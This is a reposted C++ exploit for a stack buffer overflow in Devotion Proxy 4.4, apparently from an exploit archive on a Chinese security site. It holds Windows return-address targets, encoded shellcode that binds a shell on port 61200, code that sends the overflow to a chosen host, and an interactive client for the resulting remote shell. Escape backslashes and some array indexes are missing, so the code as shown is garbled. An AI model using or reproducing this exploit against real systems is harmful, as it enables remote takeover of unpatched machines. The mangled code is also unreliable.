Devotion Proxy 4.4 Stack Overflow Exploit _安全中国_全球最大网络安全培训门户

/*
_ ___ _ _ _ _
__| |_ _ / __| | | _ _ (_)_ _| |__ __ _ ___
/ _` | '_| (_ |_ _| ' | | || | '_ / _` (_-<
__,_|_| ___| |_||_||_|/ |_,_|_.__/__,_/__/
|__/ Presents....

Devotion Proxy 4.4 Stack Overflow Exploit

Vulnerability discovered by drG4njubas[m00]
Contacts: drG4njubas[at]bk.ru, http://m00.void.ru, #m00sec(@efnet)
Greets to Over_G, D4rkGr3y, r4ShR4y, h0snp, ...

Compile with m$ visual c++: cl m00-devproxy.cpp

*/

#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <conio.h>

#pragma comment (lib,"wsock32")

struct{
char *platform;
DWORD retaddr; //jmp esp
}

targets[]={
{"Windows 2000 SP1" , 0x77e3cb4c } ,
{"Windows 2000 SP2" , 0x77e2492b } ,
{"Windows 2000 SP3" , 0x77e2afc5 } ,
{"Windows 2000 SP4" , 0x77e14c29 } ,
{"Windows XP SP0" , 0x77f5801c },
{"Windows XP SP1" , 0x77e626ba },
{"Windows NT SP6" , 0x77f32935 },
NULL
};

//Shellcode binds shell to a port 61200
//Download sources from www.m00.ru
char shellcode[]=
"xEBx0Fx58x80x30x92x40x81x38x6Dx30x30x21x75xF4"
"xEBx05xE8xECxFFxFFxFFx7BxC6x93x92x92xCFxC7xA3"
"x49xF6x19x91xD2x01x19xD1x6DxD2xE7x6Bx19xC1x91"
"xF4xA3x40xF4x2Ax92x82xF4x13xA8xDFxC8xE6x95xBB"
"x50x7Bx60x6Dx6Dx6Dx1Bx41x19xE8xAEx93x45x91xCD"
"xEAx19xD9x8Ax19xE1xB2x19xE9xB6x93x44x93x45x6E"
"x3Fx93x42x04x15x6FxC3xA3x5Bx12x53x9Dx61x34xE0"
"x98x04xCBx15x6FxE6x80xD5xD5x70x74x2Cx9Dx92x92"
"x92xBBx5CxBBx65x7Bx7Ax6Dx6Dx6DxA3x52xF4x19x95"
"x53x72x90x19xE1x8Ex93x44x93x54x3Fx93x42x1Bx54"
"x1Bx45xCFxC5x1Fx0Fx9Dx92x92x92xC1xC5x6Dx44x1F"
"x0FxC1x92x92x92xC1x6Dx42x1Bx55x1Fx0FxC8x92x92"
"x92xC1xC2x6Dx44xA3x5BxC3xC3xC3xC3xFAx93x92x92"
"x92xFAx90x92x92x92x6Dx42x1Bx51x1Fx17xF7x92x92"
"x92xC2xC5x6Dx44xFAx82x92x92x92x1Fx1FxEAx92x92"
"x92xC3xC1x6Dx42x1Fx17xF8x92x92x92xC2xC5x6Dx44"
"xFAx93x92x92x92xC1x6Dx42x1Fx17xE3x92x92x92xC2"
"xC5x6Dx44xA3x5BxC3xC3xC1x6Dx42xCDxC2x1Fx0FxD5"
"x92x92x92xC1xC5x6Dx44xFAx6Dx92x92x92xFAxD2x92"
"x92x92x6Dx42x1Bx51x1Fx1FxBAx92x92x92xC3xC5x6D"
"x44xC1x6Dx42xCAx1BxD1xD2x1BxD1xAEx1BxD1xAAx55"
"xD1xBEx93x93x92x92x1Fx17xAAx92x92x92xC2xC5x6D"
"x44xC1xC1xA3x5BxC3xC3xC3xFAx93x92x92x92xC3xC3"
"x1Fx0Fx1Ex92x92x92xC1xC3x6Dx42x1Fx17x8Ex92x92"
"x92xC2xC5x6Dx44x6Dx42x7Ax35x6Cx6Dx6DxD5xF7xE6"
"xC2xE0xFDxF1xD3xF6xF6xE0xF7xE1xE1x92xDExFDxF3"
"xF6xDExFBxF0xE0xF3xE0xEBxD3x92xD7xEAxFBxE6xC2"
"xE0xFDxF1xF7xE1xE1x92xD5xF7xE6xC1xE6xF3xE0xE6"
"xE7xE2xDBxFCxF4xFDxD3x92xD1xE0xF7xF3xE6xF7xC2"
"xE0xFDxF1xF7xE1xE1xD3x92xD5xFExFDxF0xF3xFExD3"
"xFExFExFDxF1x92xE5xE1xA0xCDxA1xA0x92xC5xC1xD3"
"xC1xFDxF1xF9xF7xE6xD3x92xF0xFBxFCxF6x92xFExFB"
"xE1xE6xF7xFCx92xF3xF1xF1xF7xE2xE6x92x90x92x7D"
"x82x92x92x92x92x92x92x92x92x92x92x92x92x93x92"
"x92x92xF1xFFxF6x92x6Dx30x30x21";

char jump[]=
"x29x4cxe1x77" //retaddr
"x90x90x90x90"
"x90x90x90x90x90"
"xE9xFCxF3xFFxFF";

char request[]=
" /Proxy.dtl?URL=www.m00.ru HTTP/1.1rn"
"Accept: */*rn"
"User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)rn"
"Connection: Keep-Alivern"
"Cookie: session-id=1rnrn";

void usage();
void have_fun(int sock);
DWORD WINAPI recv_thread(LPVOID lpParam);

void main(int argc, char **argv){

WSADATA wsaData;
SOCKADDR_IN rmaddr;
HOSTENT *addr;
SOCKET sock,shell;
DWORD tmp;
char buf[100], exploit[4096+sizeof(jump)];
int i,t;

printf("n*******************************************n");
printf(" Devotion Proxy buffer overflow exploit n");
printf(" Coded by drG4jubas[m00 Crew] n");
printf("*******************************************nn");

if(argc<4){
usage();
return;
}

t = atoi(argv[3]);
i = 0;
while(targets.platform)i++;

if(t >= i){
printf("Bad targetn");
return;
}

memcpy(jump, &targets[t].retaddr, 4);
for(i = 0; i < sizeof(exploit);i++)exploit = 'x90';
for(i =0; i < sizeof(shellcode)-1; i++)exploit[i+1038] = shellcode;
memcpy(exploit+4096, jump, sizeof(jump)-1);

WSAStartup(MAKEWORD(2,2), &wsaData);
sock = socket(AF_INET, SOCK_STREAM, 0);

addr = gethostbyname(argv[1]);
if(addr != NULL)memcpy(&(rmaddr.sin_addr.s_addr), addr->h_addr_list[0], addr->h_length);
else{
printf("Can not resolve host namen");
return;
}

rmaddr.sin_family = AF_INET;
rmaddr.sin_port = htons(atoi(argv[2]));

printf("Connecting to %s...", argv[1]);
if(connect(sock,(struct sockaddr *)&rmaddr,sizeof(rmaddr))){
printf("failedn");
return;
}
printf("okn");

printf("Sending exploit...");

send(sock, exploit, sizeof(exploit), 0);
send(sock, request, sizeof(request), 0);

printf("donen");

CreateThread(NULL, 0 ,recv_thread, (LPVOID)sock, 0, &tmp);
Sleep(100);

shell = socket(AF_INET, SOCK_STREAM, 0);
rmaddr.sin_port = htons(61200);

if(connect(shell,(struct sockaddr *)&rmaddr,sizeof(rmaddr))){
printf("Exploitation failed:(n");
closesocket(sock);
WSACleanup();
return;
}

printf("Congratulations!!! Shell spawned :Dnn");

have_fun(shell);

closesocket(shell);
closesocket(sock);
WSACleanup();
return;
}

void usage(){
int i;
printf("USAGE: ");
printf("m00-devproxy.exe <host> <port> <platform>nn");
printf("Target platforms:n");
for(i =0; targets.platform; i++)
printf("%d - %sn", i, targets.platform);
}

DWORD WINAPI recv_thread(LPVOID lpParam){
SOCKET sock;
char buf[128];
sock = (SOCKET)lpParam;
recv(sock, buf, 128, 0);
return 0;
}

void have_fun(int sock){
char buf[1024];
int i;
fd_set fdread;
TIMEVAL time;
time.tv_sec = 1;
time.tv_usec = 0;
do{
FD_ZERO(&fdread);
FD_SET(sock, &fdread);
i = select(0, &fdread, NULL, NULL, &time);
if(i > 0){
int j = recv(sock, buf, 1024, 0);
if(j == SOCKET_ERROR)break;
buf[j] = '';
printf("%s", buf);
}
if(kbhit()){
fgets(buf, 1024, stdin);
send(sock, buf, strlen(buf), 0);
if(buf[0] == 'r'){
buf[0] = 'n';
printf("%c",buf[0]);
send(sock, buf, 1, 0);
}
}
}while(i != SOCKET_ERROR);
return;
}